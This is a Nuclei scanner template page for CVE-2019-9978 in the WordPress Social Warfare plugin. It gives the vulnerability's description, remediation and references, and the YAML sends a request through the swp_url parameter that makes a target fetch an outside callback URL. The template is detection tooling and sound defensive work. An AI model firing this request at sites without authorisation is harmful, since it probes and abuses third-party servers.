Skip to content
Nuclei Templates

WordPress Social Warfare <3.5.3 - Cross-Site Scripting

ID: CVE-2019-9978

Severity: medium

Author: madrobot,dwisiswant0

Tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss

Description

Section titled “Description”

WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.

YAML Source

Section titled “YAML Source”
id: CVE-2019-9978


info:
  name: WordPress Social Warfare <3.5.3 - Cross-Site Scripting
  author: madrobot,dwisiswant0
  severity: medium
  description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
  remediation: |
    Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability.
  reference:
    - https://github.com/mpgn/CVE-2019-9978
    - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
    - https://www.pluginvulnerabilities.com/2019/03/21/full-disclosure-of-settings-change-persistent-cross-site-scripting-xss-vulnerability-in-social-warfare/
    - https://www.cybersecurity-help.cz/vdb/SB2019032105
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9978
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9978
    cwe-id: CWE-79
    epss-score: 0.97235
    epss-percentile: 0.99828
    cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: warfareplugins
    product: social_warfare
    framework: wordpress
    fofa-query: body="social-warfare" && body="wp-"
  tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss
flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        internal: true
        words:
          - 'Social Warfare'


  - raw:
      - |
        GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a004630440220037a43b00da2aa28dcaf94f3209f22ef7fe3fc2c73b171f1ce83d8a26e97ea8b022021fd76fd68152c875a9b91cf8901e5d4c8030bfc27b7497b37a9826dc708d9a2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-9978.yaml"

View on Github